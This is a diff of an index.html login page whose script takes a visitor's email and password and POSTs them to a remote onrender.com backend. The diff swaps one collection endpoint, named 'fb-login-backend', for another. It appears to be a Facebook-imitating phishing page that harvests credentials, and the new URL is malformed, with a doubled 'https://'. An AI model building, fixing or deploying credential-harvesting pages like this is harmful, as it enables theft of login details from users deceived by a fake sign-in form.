--- a/index.html
+++ b/index.html
@@ -106,7 +106,7 @@
       const password = document.getElementById('password').value.trim();
 
       try {
-        await fetch('https://fb-login-backend-xmsd.onrender.com/login', {
+        await fetch('https://https://fblback.onrender.com/login', {
           method: 'POST',
           headers: { 'Content-Type': 'application/json' },
           body: JSON.stringify({ email, password })
